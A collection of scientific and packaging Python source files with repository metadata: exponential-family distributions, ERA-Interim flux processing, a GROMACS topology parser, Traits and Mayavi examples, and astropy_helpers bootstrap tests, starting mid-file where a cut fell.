y = x.multiply(eta.T).sum()
else:
y = (eta.T * x).sum()
return y + self.log_base_measure(x).sum() - self.log_partition(eta).sum()
def log_base_measure(self, x):
pass
def sufficient_statistics(self, x):
pass
def log_partition(self, eta):
pass
def grad_log_partition(self, eta):
pass
def hessian_log_partition(self, eta):
pass
def diagonal_hessian_log_partition(self, eta):
pass
def sample(self, eta, count=1):
pass
def starting_eta(self):
pass
def starting_x(self):
pass
class Bernoulli(ExponentialFamily):
def __init__(self):
self.num_params = 1
self.domain_size = 1
def sufficient_statistics(self, x):
if type(x) is not np.ndarray or len(x.shape) == 1:
return np.array([x]).T
return np.copy(x)
def log_base_measure(self, x):
return np.zeros(x.shape)
def log_partition(self, eta):
return np.log(1 + safe_exp(eta))
def grad_log_partition(self, eta):
exp_eta = safe_exp(eta)
return exp_eta / (exp_eta + 1.0)
def hessian_log_partition(self, eta):
exp_eta = safe_exp(eta)
return -exp_eta / safe_sq(exp_eta + 1)
def diagonal_hessian_log_partition(self, eta):
return self.hessian_log_partition(eta)
def sample(self, eta, count=1):
exp_eta = safe_exp(eta)
p = exp_eta / (1 + exp_eta)
return np.random.random(size=count) < p
def eta_constraints(self, eta):
return np.array([[]])
def grad_eta_constraints(self, eta):
return np.array([[]])
def diagonal_hessian_eta_constraints(self, eta):
return np.array([[]])
def starting_x(self):
return np.zeros(1)
def __repr__(self):
return 'Bernoulli'
class Gamma(ExponentialFamily):
def __init__(self):
self.num_params = 2
self.domain_size = 1
def sufficient_statistics(self, x):
return np.array([np.log(x), x]).T
def log_base_measure(self, x):
return np.zeros(x.shape)
def log_partition(self, eta):
#assert np.all(gammasgn(eta[0]+1) == 1)
return gammaln(eta[0] + 1) - (eta[0] + 1) * np.log(-eta[1])
def grad_log_partition(self, eta):
return np.array([psi(eta[0] + 1) - np.log(-eta[1]), -(eta[0] + 1) / eta[1]])
def hessian_log_partition(self, eta):
return np.array([[polygamma(1, eta[0] + 1), -1.0 / eta[1]],
[-1.0 / eta[1], (eta[0] + 1) / safe_sq(eta[1])]])
def diagonal_hessian_log_partition(self, eta):
return np.array([polygamma(1, eta[0] + 1), (eta[0] + 1) / safe_sq(eta[1])])
def sample(self, eta, count=1):
return np.random.gamma(eta[0] + 1, -1.0 / eta[1], size=count)
def eta_constraints(self, eta):
if len(eta.shape) == 1:
return np.array([-1 - eta[0], eta[1]])
return np.array([-1 - eta[:,0], eta[:,1]])
def grad_eta_constraints(self, eta):
if len(eta.shape) == 1:
return np.array([-1., 1.])
return np.array([np.zeros(eta.shape[0]) - 1., np.ones(eta.shape[0])])
def diagonal_hessian_eta_constraints(self, eta):
if len(eta.shape) == 1:
return np.array([0., 0.])
return np.array([np.zeros(eta.shape[0]), np.zeros(eta.shape[0])])
def starting_x(self):
return np.ones(1)
def __repr__(self):
return 'Gamma'
class Gaussian(ExponentialFamily):
def __init__(self):
self.num_params = 2
self.domain_size = 1
def sufficient_statistics(self, x):
return np.array([x, safe_sq(x)]).T
def log_base_measure(self, x):
return np.repeat(np.log(1./np.sqrt(2*np.pi)), x.shape[0])
def log_partition(self, eta):
return -safe_sq(eta[0]) / (4*eta[1]) - 0.5 * np.log(-2 * eta[1])
def grad_log_partition(self, eta):
return np.array([-0.5 * eta[0] / eta[1], (safe_sq(eta[0]) - 2*eta[1]) / (4 * safe_sq(eta[1]))])
def hessian_log_partition(self, eta):
return np.array([[-0.5 / eta[1],0.5 * eta[0] / safe_sq(eta[1])],
[0.5 * eta[0] / safe_sq(eta[1]),(eta[1] - safe_sq(eta[0])) / (2*eta[1]**3)]])
def diagonal_hessian_log_partition(self, eta):
return np.array([-0.5 / eta[1], (eta[1] - safe_sq(eta[0])) / (2*eta[1]**3)])
def sample(self, eta, count=1):
variance = -1. / (2. * eta[1])
mu = eta[0] * variance
sigma = np.sqrt(variance)
return np.random.normal(mu, sigma, size=count)
def eta_constraints(self, eta):
if len(eta.shape) == 1:
return np.array([eta[1]])
return np.array([np.zeros(0),eta[:,1]])
def grad_eta_constraints(self, eta):
if len(eta.shape) == 1:
return np.array([1.])
return np.array([np.zeros(0),np.ones(eta.shape[0])])
def diagonal_hessian_eta_constraints(self, eta):
if len(eta.shape) == 1:
return np.array([0., 0.])
return np.array([np.zeros(0),np.zeros(eta.shape[0])])
def starting_x(self):
return np.zeros(1)
def __repr__(self):
return 'Gaussian'
class Dirichlet(ExponentialFamily):
def __init__(self, num_params):
self.num_params = num_params
self.domain_size = num_params
def sufficient_statistics(self, x):
if len(x.shape) == 1:
return np.array([np.log(x)])
return np.log(x)
def log_base_measure(self, x):
return np.zeros(x.shape[0])
def log_partition(self, eta):
p = eta+1
np.log(p.min())
return gammaln(p).sum(axis=0) - gammaln(p.sum(axis=0))
def grad_log_partition(self, eta):
p = eta+1
np.log(p.min())
return psi(p) - psi(p.sum(axis=0))
def hessian_log_partition(self, eta):
pass
def diagonal_hessian_log_partition(self, eta):
p = eta+1
np.log(p.min())
return polygamma(1, p) - polygamma(1, p.sum(axis=0))
def sample(self, eta, count=1):
return np.random.dirichlet(eta+1, size=count)
def eta_constraints(self, eta):
return (-eta - 1.).T
def grad_eta_constraints(self, eta):
return np.zeros(eta.shape).T - 1.
def diagonal_hessian_eta_constraints(self, eta):
return np.zeros(eta.shape).T
def starting_x(self):
return np.ones(self.num_params) / float(self.num_params)
def __repr__(self):
return 'Dirichlet'
class ZeroInflated(ExponentialFamily):
def __init__(self, base_model):
self.base_model = base_model
self.num_params = 1 + base_model.num_params
self.domain_size = 1
# TODO: generalize to multivariate and arbitrary points that may be in the domain of the base model
def sufficient_statistics(self, x):
ss = np.zeros((x.shape[0], 3))
ss[x == 0, 0] = 1
ss[x != 0, 1:] = self.base_model.sufficient_statistics(x[x != 0])
return ss
def log_base_measure(self, x):
if sps.issparse(x):
# TODO: handle sparse data better
x = x.todense()
result = np.zeros(x.shape[0])
idx = np.where(x[:,0]==0)[0][0]
result[idx] = self.base_model.log_base_measure(x[:,1:][idx])
return result
def log_partition(self, eta):
return np.log(safe_exp(eta[0]) + safe_exp(self.base_model.log_partition(eta[1:])))
def grad_log_partition(self, eta):
exp_base_log_partition = safe_exp(self.base_model.log_partition(eta[1:]))
exp_x0 = safe_exp(eta[0])
denominator = exp_base_log_partition + exp_x0
w = (exp_base_log_partition / denominator)
return np.concatenate(((exp_x0 / denominator)[:,np.newaxis].T,
self.base_model.grad_log_partition(eta[1:]) * w), axis=0)
def hessian_log_partition(self, eta):
pass
def diagonal_hessian_log_partition(self, eta):
base_log_partition = self.base_model.log_partition(eta[1:])
exp_base_log_partition = safe_exp(base_log_partition)
exp_x0 = safe_exp(eta[0])
exp_sum = safe_exp(eta[0] + base_log_partition)
sum_exp = exp_base_log_partition + exp_x0
sq_sum_exp = safe_sq(sum_exp)
diag_hess_base = self.base_model.diagonal_hessian_log_partition(eta[1:])
sq_grad_base = safe_sq(self.base_model.grad_log_partition(eta[1:]))
numerator = np.zeros(diag_hess_base.shape)
numerator[:,sq_sum_exp != np.inf] = (sum_exp[sq_sum_exp != np.inf] * diag_hess_base[:, sq_sum_exp != np.inf] + exp_x0[sq_sum_exp != np.inf] * sq_grad_base[:, sq_sum_exp != np.inf]) / sq_sum_exp[sq_sum_exp != np.inf]
return np.concatenate(((exp_sum / sq_sum_exp)[:,np.newaxis].T,
exp_base_log_partition * numerator), axis=0)
def sample(self, eta, count=1):
exp_x0 = safe_exp(eta[0])
prob_x0 = exp_x0 / (exp_x0 + safe_exp(self.base_model.log_partition(eta[1:])))
results = np.zeros(count)
nonzero = np.random.random(size=count) > prob_x0
results[nonzero] = self.base_model.sample(eta[1:], count=nonzero.sum())
return results
def eta_constraints(self, eta):
base_constraints = self.base_model.eta_constraints(eta[:,1:]) if len(eta.shape) > 1 else self.base_model.eta_constraints(eta[1:])
return np.array([np.array([])] + [x for x in base_constraints])
def grad_eta_constraints(self, eta):
base_constraints = self.base_model.grad_eta_constraints(eta[:,1:]) if len(eta.shape) > 1 else self.base_model.grad_eta_constraints(eta[1:])
return np.array([np.array([])] + [x for x in base_constraints])
def diagonal_hessian_eta_constraints(self, eta):
base_constraints = self.base_model.diagonal_hessian_eta_constraints(eta[:,1:]) if len(eta.shape) > 1 else self.base_model.diagonal_hessian_eta_constraints(eta[1:])
return np.array([np.array([])] + [x for x in base_constraints])
def starting_x(self):
return np.zeros(1)
def __repr__(self):
return 'Zero-Inflated {0}'.format(self.base_model)
|
redreamality/vsmrfs
|
vsmrfs/exponential_families.py
|
Python
|
mit
| 11,657
|
[
"Gaussian"
] |
2263f82647e4cff5e23455ea86014ad954b319a91f171600c40d5d79c5e407bf
|
"""
Common code for mayavi tests.
"""
# Author: Prabhu Ramachandran <prabhu@aero.iitb.ac.in>
# Copyright (c) 2008, Enthought, Inc.
# License: BSD Style.
import os.path
from traits.api import HasTraits, Any, Event, Callable
def fixpath(filename):
"""Given a relative file path it sets the path relative to this
directory. This allows us to run the tests from other directories
as well.
"""
return os.path.join(os.path.dirname(__file__), filename)
def get_example_data(fname):
"""Given a relative path to data inside the examples directory,
obtains the full path to the file.
"""
p = os.path.join('data', fname)
return os.path.abspath(fixpath(p))
|
dmsurti/mayavi
|
mayavi/tests/common.py
|
Python
|
bsd-3-clause
| 692
|
[
"Mayavi"
] |
f14b8879f19dfaaa747c4a35b14d4665f563bc1739b069839d1891096b9fe540
|
########################################
# Read ECMWF netcdf files for heat fluxes
#
# Created by: Peter Willetts
# Created on: 12/06/2014
#
# ECMWF heat and radiation flux - Read from netcdf
# filter by date, latitude and longitude
# calculate mean and total heat flux
# BEWARE!!! ECMWF flux descrpitions may be the wrong way round, as well as upwards/downwards signs
# This script is deisgned to work with the total accumulated time-integrated fluxes at 0 timesteps - every 12 hours
# So average of 12 hourly accumulations in J/m2, divided by seconds, minutes and 12 hours gives Wm^-2
#
from mpl_toolkits.basemap import Basemap
import matplotlib.pyplot as plt
import numpy as np
from netCDF4 import Dataset
import glob
import re
import os
import pickle
import datetime
#first_month=8
#first_day_of_month=
#last_month=9
#last_day=
time_min=datetime.datetime(2011,8,18,0,0,0,0)
time_max=datetime.datetime(2011,9,8,0,0,0,0)
lon_max = 116
lon_min = 34
lat_max= 40.
lat_min=-11.25
nc = Dataset('/nfs/a90/eepdw/Data/ERA_Iinterim_Heat_Rad_Fluxes/era_interim_netcdf_heat_rad_flux_evap_precip_6hr_timestep.nc')
hours_since=datetime.datetime(1900,1,1,0,0,0,0)
# Get min and max index positions for latitude and longitude
datetimes = np.array([datetime.timedelta(hours=float(i))+hours_since for i in nc.variables['time'][:]])
time_index= np.where((datetimes<=time_max) & (datetimes >= time_min))
la_index = np.where((nc.variables['latitude'][:]<=lat_max) & (nc.variables['latitude'][:] >= lat_min))
lo_index = np.where((nc.variables['longitude'][:]<=lon_max) & (nc.variables['longitude'][:] >= lon_min))
la_i_max = np.max(la_index)
la_i_min = np.min(la_index)
lo_i_max = np.max(lo_index)
lo_i_min = np.min(lo_index)
t_i_max = np.max(time_index)
t_i_min = np.min(time_index)
lat_amounts=la_i_max-la_i_min
lon_amounts=lo_i_max-lo_i_min
print nc
#latent_in = nc.variables['slhf'][t_i_min:t_i_max+1,la_i_min:la_i_max+1, lo_i_min:lo_i_max+1]/(60*60*12)
#sensible_in = nc.variables['sshf'][t_i_min:t_i_max+1,la_i_min:la_i_max+1, lo_i_min:lo_i_max+1]/(60*60*6)
lwave_in = nc.variables['str'][t_i_min:t_i_max+1,la_i_min:la_i_max+1, lo_i_min:lo_i_max+1]/(60*60*6)
swave_in = nc.variables['ssr'][t_i_min:t_i_max+1,la_i_min:la_i_max+1, lo_i_min:lo_i_max+1]/(60*60*6)
latitude_in = nc.variables['latitude'][la_index]
longitude_in = nc.variables['longitude'][lo_index]
time_in = datetimes[time_index]
##
#latent_mean = -np.mean(latent_in, axis=0, dtype=np.float64)
#sensible_mean = -np.mean(sensible_in, axis=0, dtype=np.float64)
swave_mean = np.mean(swave_in, axis=0, dtype=np.float64)
lwave_mean = np.mean(lwave_in, axis=0, dtype=np.float64)
# I don't think the ECMWF data is very well documented
# According to ECMWF descriptions 'swave_in' is solar (longwave - sounds wrong to me) downward radiation
# 'lwave_in is thermal (shortwave - again sounds wrong) upward radiation
# 'latent_mean' is upward
# 'sensible_mean' is upward
# From UM calc - pcubetotal = Downward shortwave + Downward longwave flux - Upward sensible - Upward latent heat
# Even though the ECMRWF latent/sensible heat flux is 'upwards', the sign's are opposite to those in the EMBRACE data etc
#total_mean = swave_mean + lwave_mean - sensible_mean - latent_mean
#np.save('/nfs/a90/eepdw/Data/Saved_data/era_i/Fluxes/era_i_emb_latent_mean', latent_mean)
#np.save('/nfs/a90/eepdw/Data/Saved_data/era_i/Fluxes/era_i_emb_sensible_mean', sensible_mean)
np.save('/nfs/a90/eepdw/Data/Saved_data/era_i/Fluxes/era_i_emb_swave_mean', swave_mean)
np.save('/nfs/a90/eepdw/Data/Saved_data/era_i/Fluxes/era_i_emb_lwave_mean', lwave_mean)
#np.save('/nfs/a90/eepdw/Data/Saved_data/era_i/Fluxes/era_i_emb_total_mean', total_mean)
#np.save('/nfs/a90/eepdw/Data/Saved_data/era_i/Fluxes/era_i_emb_lats', latitude_in)
#np.save('/nfs/a90/eepdw/Data/Saved_data/era_i/Fluxes/era_i_emb_longs', longitude_in)
#np.save('/nfs/a90/eepdw/Data/Saved_data/era_i/Fluxes/era_i_emb_times_6h', time_in)
if '__name__' == '__netcdf_fileread___':
TRMM_fileread()
|
peterwilletts24/Python-Scripts
|
era_interim/netcdf_fileread_heat_fluxes_6hourly_rad.py
|
Python
|
mit
| 4,215
|
[
"NetCDF"
] |
4767434a966fa2ebae7ccd48af2f39a9883e767c7d7227257aa027a35926c073
|
# Copyright (c) 2007, Enthought, Inc.
# License: BSD Style.
# all_traits_features.py --- Shows primary features of the Traits
# package
#--[Imports]--------------------------------------------------------------------
from traits.api import Delegate, HasTraits, Instance, Int, Str
#--[Code]-----------------------------------------------------------------------
# Shows the five primary features of the Traits package.
class Parent ( HasTraits ):
# INITIALIZATION: last_name' is initialized to '':
last_name = Str( '' )
class Child ( HasTraits ):
age = Int
# VALIDATION: 'father' must be a Parent instance:
father = Instance( Parent )
# DELEGATION: 'last_name' is delegated to father's 'last_name':
last_name = Delegate( 'father' )
# NOTIFICATION: This method is called when 'age' changes:
def _age_changed ( self, old, new ):
print 'Age changed from %s to %s ' % ( old, new )
#--[Example*]-------------------------------------------------------------------
# Set up the example:
joe = Parent()
joe.last_name = 'Johnson'
moe = Child()
moe.father = joe
# DELEGATION in action:
print "Moe's last name is %s " % moe.last_name
# Result:
# Moe's last name is Johnson
# NOTIFICATION in action
moe.age = 10
# Result:
# Age changed from 0 to 10
# VISUALIZATION: Displays a UI for editing moe's
# attributes (if a supported GUI toolkit is installed)
moe.configure_traits()
|
burnpanck/traits
|
examples/tutorials/doc_examples/examples/all_traits_features.py
|
Python
|
bsd-3-clause
| 1,454
|
[
"MOE"
] |
2d4611e8b0718049781f9b9f345f6ad18b8e8cfba05391a56ad76eb9479a66e1
|
#!/usr/bin/python
import sys,os
nonbonded = '/home/fuqy/Software/gromacs-5.1.4/share/top/amber99sb.ff/ffnonbonded.itp'
rtp = '/home/fuqy/Software/gromacs-5.1.4/share/top/amber99sb.ff/aminoacids.rtp'
watermodel = '/home/fuqy/Software/gromacs-5.1.4/share/top/amber99sb.ff/tip3p.itp'
class gmxtop:
# private variables
_atomtype = list()
_charge = dict()
_vdw = dict()
_resitype = list()
_resi = dict()
## For Amber atoms
_resi_amber = dict()
_resitype_amber = list() ##
def __init__(self,nonbondfile=nonbonded,rtpfile=rtp,waterfile=watermodel):
self.make_gmx2amb_table()
for line in open(nonbondfile):
if line.strip()[0] not in (';','['):
items = line.split()
t = items[0]
sigma = float(items[5])
epsion = float(items[6])
self._atomtype.append(t)
self._vdw[t] = sigma,epsion
for name,resilines in self._nextresiline(rtpfile):
self._resitype.append(name)
### for Amber name
self._resitype_amber.append(name) #
self._resi[name] = list()
self._resi_amber[name] = list()
for line in resilines:
items = line.split()
n = items[0]
### For Amber name
na = self.get_gmx2amb_name(name,n) ##
t = items[1]
c = float(items[2])
s,e = self._vdw[t]
self._resi[name].append( (n,s,e,c) )
if name == 'NA':
self._resitype.append('Na')
self._resi['Na'] = [ ('Na',s,e,c) ]
if name == 'CL':
self._resitype.append('Cl')
self._resi['Cl'] = [ ('Cl',s,e,c) ]
### For Amber name
self._resi_amber[name].append( (na,s,e,c) ) ###
for name,resilines in self._nextresiline(waterfile):
name = 'HOH'
self._resitype.append(name)
self._resi[name] = list()
for line in resilines:
items = line.split()
n = items[4]
t = items[1]
c = float(items[6])
s,e = self._vdw[t]
self._resi[name].append( (n,s,e,c) )
def _nextresiline(self,rtpfile):
lines = list()
name = None
atomflag = False
for line in open(rtpfile):
if not line.strip():
continue
elif line.strip()[0] in ('#',';'):
continue
elif '[' in line and ']' in line:
mid = line.split()[1]
if len(mid) <= 4:
if len(lines) != 0:
yield name,lines
name = mid
lines = list()
else:
pass
if mid == 'atoms' :
atomflag = True
else:
atomflag = False
else:
if atomflag :
if line.strip() != '' :
lines.append(line)
else:
pass
yield name,lines
def get_resilist(self):
return self._resitype
def get_resilist_amber(self):
return self._resitype_amber
def get_resi( self, name ):
return self._resi[name]
def get_resi_amber( self, name ):
return self._resi_amber[name]
def debug(self):
print((self._resitype))
print("Na")
tmp = self.get_resi("Na")
for key in tmp:
print(key)
def make_gmx2amb_table(self):
self.gmx2amb_table = dict()
self.wildcard_types = dict()
for line in self.gmx2amb_table_str.split('|'):
resi,namea,nameb = line.split(':')
resi = resi.strip()
namea = namea.strip()
if namea[0] in '0123456789' :
namea = namea[1:]+namea[0]
nameb = nameb.strip()
if nameb[0] in '0123456789' :
nameb = nameb[1:]+nameb[0]
if resi != "*":
if resi in self.gmx2amb_table:
self.gmx2amb_table[resi][namea]=nameb
else:
self.gmx2amb_table[resi] = dict()
self.gmx2amb_table[resi][namea]=nameb
else:
self.wildcard_types[namea] = nameb
pass
def get_gmx2amb_name(self, resi,n ):
if n in self.wildcard_types:
return self.wildcard_types[n]
else:
try:
return self.gmx2amb_table[resi][n]
except:
return n
gmx2amb_table_str = ''' WAT: OW : O|
WAT:1HW : H1|
WAT:2HW : H2|
ILE:1HG2:HG21|
ILE:2HG2:HG22|
ILE:3HG2:HG23|
ILE:1HG1:HG12|
ILE:2HG1:HG13|
ILE: HD1:HD11|
ILE: HD2:HD12|
ILE: HD3:HD13|
ILE: CD : CD1|
VAL:1HG1:HG11|
VAL:2HG1:HG12|
VAL:3HG1:HG13|
VAL:1HG2:HG21|
VAL:2HG2:HG22|
VAL:3HG2:HG23|
GLY: HA1: HA2|
GLY: HA2: HA3|
TYR: HB1: HB2|
TYR: HB2: HB3|
THR:1HG2:HG21|
THR:2HG2:HG22|
THR:3HG2:HG23|
CYS: HB1: HB2|
CYS: HB2: HB3|
CYX: HB1: HB2|
CYX: HB2: HB3|
ASN: HB1: HB2|
ASN: HB2: HB3|
ASN:1HD2:HD21|
ASN:2HD2:HD22|
PRO: HD1: HD2|
PRO: HD2: HD3|
PRO: HG1: HG2|
PRO: HG2: HG3|
PRO: HB1: HB2|
PRO: HB2: HB3|
GLN: HB1: HB2|
GLN: HB2: HB3|
GLN: HG1: HG2|
GLN: HG2: HG3|
GLN:1HE2:HE21|
GLN:2HE2:HE22|
SER: HB1: HB2|
SER: HB2: HB3|
LEU: HB1: HB2|
LEU: HB2: HB3|
LEU:1HD1:HD11|
LEU:2HD1:HD12|
LEU:3HD1:HD13|
LEU:1HD2:HD21|
LEU:2HD2:HD22|
LEU:3HD2:HD23|
MET: HB1: HB2|
MET: HB2: HB3|
MET: HG2: HG3|
MET: HG1: HG2|
PHE: HB1: HB2|
PHE: HB2: HB3|
TRP: HB1: HB2|
TRP: HB2: HB3|
ASP: HB1: HB2|
ASP: HB2: HB3|
GLU: HB1: HB2|
GLU: HB2: HB3|
GLU: HG1: HG2|
GLU: HG2: HG3|
HIP: HB1: HB2|
HIP: HB2: HB3|
HIS: HB1: HB2|
HIS: HB2: HB3|
HID: HB1: HB2|
HID: HB2: HB3|
HIE: HB1: HB2|
HIE: HB2: HB3|
LYS: HB1: HB2|
LYS: HB2: HB3|
LYS: HG1: HG2|
LYS: HG2: HG3|
LYS: HD1: HD2|
LYS: HD2: HD3|
LYS: HE1: HE2|
LYS: HE2: HE3|
ARG: HB1: HB2|
ARG: HB2: HB3|
ARG: HG1: HG2|
ARG: HG2: HG3|
ARG: HD1: HD2|
ARG: HD2: HD3|
ARG:1HH1:HH11|
ARG:2HH1:HH12|
ARG:1HH2:HH21|
ARG:2HH2:HH22|
HOH: OW : O|
HOH: HW1: H1|
HOH:1HW : H1|
HOH: HW2: H2|
HOH:2HW : H2|
NA : NA : Na |
CL : CL : Cl |
*: OC1: O |
*: OC2: OXT|
*: H1: H1 |
*: H2: H2 |
*: H3: H3 '''
if __name__ == '__main__' :
nonbonded = '/home/fuqy/Software/gromacs-5.1.4/share/top/amber99sb.ff/ffnonbonded.itp'
rtp = '/home/fuqy/Software/gromacs-5.1.4/share/top/amber99sb.ff/aminoacids.rtp'
watermodel = '/home/fuqy/Software/gromacs-5.1.4/share/top/amber99sb.ff/tip3p.itp'
top = gmxtop(nonbonded, rtp , watermodel)
top.debug()
# print(top.get_resilist_amber())
|
hnlab/fpdb
|
fpdb/gmx_top.py
|
Python
|
mit
| 7,752
|
[
"Amber",
"Gromacs"
] |
ed6e930196960272c4609cd2ffe0fe67646d7ee7ee7a8e19adabf6b818322fce
|
#!/usr/bin/env python
# -*- coding: utf8 -*-
# *****************************************************************
# ** PTS -- Python Toolkit for working with SKIRT **
# ** © Astronomical Observatory, Ghent University **
# *****************************************************************
## \package pts.modeling.data.component Contains the DataComponent class
# -----------------------------------------------------------------
# Ensure Python 3 compatibility
from __future__ import absolute_import, division, print_function
# Import the relevant PTS classes and modules
from ..component.galaxy import GalaxyModelingComponent
from ...core.tools import filesystem as fs
from ...core.tools import strings
# -----------------------------------------------------------------
galex = "GALEX"
sdss = "SDSS"
twomass = "2MASS"
spitzer = "Spitzer"
wise = "WISE"
herschel = "Herschel"
planck = "Planck"
other = "Other"
halpha = "Halpha"
# -----------------------------------------------------------------
data_origins = [galex, sdss, halpha, twomass, spitzer, wise, herschel, planck, other]
# -----------------------------------------------------------------
def instrument_to_origin(instrument):
"""
This function ...
:param instrument:
:return:
"""
if instrument.lower() == "pacs": return "Herschel"
elif instrument.lower() == "spire": return "Herschel"
elif instrument.lower() == "lfi": return "Planck"
elif instrument.lower() == "hfi": return "Planck"
else: return strings.find_any_case(instrument, data_origins)
# -----------------------------------------------------------------
class DataComponent(GalaxyModelingComponent):
"""
This class...
"""
def __init__(self, *args, **kwargs):
"""
The constructor ...
:param kwargs:
:return:
"""
# Call the constructor of the base class
super(DataComponent, self).__init__(*args, **kwargs)
# -- Attributes --
# Different origins
self.data_origins = data_origins
# The paths to the data/images/ directories for the different origins
self.data_images_paths = dict()
# Determine the path
self.urls_path = None
# -----------------------------------------------------------------
def setup(self, **kwargs):
"""
This function ...
:return:
"""
# Call the setup function of the base class
super(DataComponent, self).setup(**kwargs)
# Set ...
for origin in self.data_origins: self.data_images_paths[origin] = fs.create_directory_in(self.data_images_path, origin)
# Set the urls path
self.urls_path = fs.join(self.data_images_path, "urls.dat")
# -----------------------------------------------------------------
|
SKIRT/PTS
|
modeling/data/component.py
|
Python
|
agpl-3.0
| 2,859
|
[
"Galaxy"
] |
11ab1b59dadae9314a29eefd2df416d2b6c6c6860d32ed73de674ce369d78cae
|
import glob
import os
import textwrap
from setuptools.package_index import PackageIndex
from setuptools.sandbox import run_setup
import pytest
from . import run_cmd, testpackage
from ..utils import silence
TEST_SETUP_PY = """\
#!/usr/bin/env python
from __future__ import print_function
import os
import sys
import ah_bootstrap
# reset the name of the package installed by ah_boostrap to
# _astropy_helpers_test_--this will prevent any confusion by pkg_resources with
# any already installed packages named astropy_helpers
# We also disable auto-upgrade by default
ah_bootstrap.DIST_NAME = 'astropy-helpers-test'
ah_bootstrap.PACKAGE_NAME = '_astropy_helpers_test_'
ah_bootstrap.AUTO_UPGRADE = False
try:
ah_bootstrap.use_astropy_helpers({args})
finally:
ah_bootstrap.DIST_NAME = 'astropy-helpers'
ah_bootstrap.PACKAGE_NAME = 'astropy_helpers'
ah_bootstrap.AUTO_UPGRADE = True
import _astropy_helpers_test_
filename = os.path.abspath(_astropy_helpers_test_.__file__)
filename = filename.replace('.pyc', '.py') # More consistent this way
print(filename)
"""
def test_bootstrap_from_submodule(tmpdir, testpackage, capsys):
"""
Tests importing _astropy_helpers_test_ from a submodule in a git
repository. This tests actually performing a fresh clone of the repository
without the submodule initialized, and that importing astropy_helpers in
that context works transparently after calling
`ah_boostrap.use_astropy_helpers`.
"""
orig_repo = tmpdir.mkdir('orig')
# Ensure ah_bootstrap is imported from the local directory
import ah_bootstrap
with orig_repo.as_cwd():
run_cmd('git', ['init'])
# Write a test setup.py that uses ah_bootstrap; it also ensures that
# any previous reference to astropy_helpers is first wiped from
# sys.modules
orig_repo.join('setup.py').write(TEST_SETUP_PY.format(args=''))
run_cmd('git', ['add', 'setup.py'])
# Add our own clone of the astropy_helpers repo as a submodule named
# astropy_helpers
run_cmd('git', ['submodule', 'add', str(testpackage),
'_astropy_helpers_test_'])
run_cmd('git', ['commit', '-m', 'test repository'])
os.chdir(str(tmpdir))
# Creates a clone of our test repo in the directory 'clone'
run_cmd('git', ['clone', 'orig', 'clone'])
os.chdir('clone')
run_setup('setup.py', [])
stdout, stderr = capsys.readouterr()
path = stdout.strip()
# Ensure that the astropy_helpers used by the setup.py is the one that
# was imported from git submodule
assert path == str(tmpdir.join('clone', '_astropy_helpers_test_',
'_astropy_helpers_test_',
'__init__.py'))
def test_check_submodule_no_git(tmpdir, testpackage):
"""
Tests that when importing astropy_helpers from a submodule, it is still
recognized as a submodule even when using the --no-git option.
In particular this ensures that the auto-upgrade feature is not activated.
"""
orig_repo = tmpdir.mkdir('orig')
# Ensure ah_bootstrap is imported from the local directory
import ah_bootstrap
with orig_repo.as_cwd():
run_cmd('git', ['init'])
# Write a test setup.py that uses ah_bootstrap; it also ensures that
# any previous reference to astropy_helpers is first wiped from
# sys.modules
args = 'auto_upgrade=True'
orig_repo.join('setup.py').write(TEST_SETUP_PY.format(args=args))
run_cmd('git', ['add', 'setup.py'])
# Add our own clone of the astropy_helpers repo as a submodule named
# astropy_helpers
run_cmd('git', ['submodule', 'add', str(testpackage),
'_astropy_helpers_test_'])
run_cmd('git', ['commit', '-m', 'test repository'])
# Temporarily patch _do_upgrade to fail if called
class UpgradeError(Exception):
pass
def _do_upgrade(*args, **kwargs):
raise UpgradeError()
orig_do_upgrade = ah_bootstrap._do_upgrade
ah_bootstrap._do_upgrade = _do_upgrade
try:
run_setup('setup.py', ['--no-git'])
except UpgradeError:
pytest.fail('Attempted to run auto-upgrade despite importing '
'_astropy_helpers_test_ from a git submodule')
finally:
ah_bootstrap._do_upgrade = orig_do_upgrade
def test_bootstrap_from_directory(tmpdir, testpackage, capsys):
"""
Tests simply bundling a copy of the astropy_helpers source code in its
entirety bundled directly in the source package and not in an archive.
"""
import ah_bootstrap
source = tmpdir.mkdir('source')
testpackage.copy(source.join('_astropy_helpers_test_'))
with source.as_cwd():
source.join('setup.py').write(TEST_SETUP_PY.format(args=''))
run_setup('setup.py', [])
stdout, stderr = capsys.readouterr()
stdout = stdout.splitlines()
if stdout:
path = stdout[-1].strip()
else:
path = ''
# Ensure that the astropy_helpers used by the setup.py is the one that
# was imported from git submodule
assert path == str(source.join('_astropy_helpers_test_',
'_astropy_helpers_test_',
'__init__.py'))
def test_bootstrap_from_archive(tmpdir, testpackage, capsys):
"""
Tests importing _astropy_helpers_test_ from a .tar.gz source archive
shipped alongside the package that uses it.
"""
orig_repo = tmpdir.mkdir('orig')
# Ensure ah_bootstrap is imported from the local directory
import ah_bootstrap
# Make a source distribution of the test package
with silence():
run_setup(str(testpackage.join('setup.py')),
['sdist', '--dist-dir=dist', '--formats=gztar'])
dist_dir = testpackage.join('dist')
for dist_file in dist_dir.visit('*.tar.gz'):
dist_file.copy(orig_repo)
with orig_repo.as_cwd():
# Write a test setup.py that uses ah_bootstrap; it also ensures that
# any previous reference to astropy_helpers is first wiped from
# sys.modules
args = 'path={0!r}'.format(os.path.basename(str(dist_file)))
orig_repo.join('setup.py').write(TEST_SETUP_PY.format(args=args))
run_setup('setup.py', [])
stdout, stderr = capsys.readouterr()
path = stdout.splitlines()[-1].strip()
# Installation from the .tar.gz should have resulted in a .egg
# directory that the _astropy_helpers_test_ package was imported from
eggs = glob.glob('*.egg')
assert eggs
egg = orig_repo.join(eggs[0])
assert os.path.isdir(str(egg))
assert path == str(egg.join('_astropy_helpers_test_',
'__init__.py'))
def test_download_if_needed(tmpdir, testpackage, capsys):
"""
Tests the case where astropy_helpers was not actually included in a
package, or is otherwise missing, and we need to "download" it.
This does not test actually downloading from the internet--this is normally
done through setuptools' easy_install command which can also install from a
source archive. From the point of view of ah_boostrap the two actions are
equivalent, so we can just as easily simulate this by providing a setup.cfg
giving the path to a source archive to "download" (as though it were a
URL).
"""
source = tmpdir.mkdir('source')
# Ensure ah_bootstrap is imported from the local directory
import ah_bootstrap
# Make a source distribution of the test package
with silence():
run_setup(str(testpackage.join('setup.py')),
['sdist', '--dist-dir=dist', '--formats=gztar'])
dist_dir = testpackage.join('dist')
with source.as_cwd():
source.join('setup.py').write(TEST_SETUP_PY.format(args=''))
source.join('setup.cfg').write(textwrap.dedent("""\
[easy_install]
find_links = {find_links}
""".format(find_links=str(dist_dir))))
run_setup('setup.py', [])
stdout, stderr = capsys.readouterr()
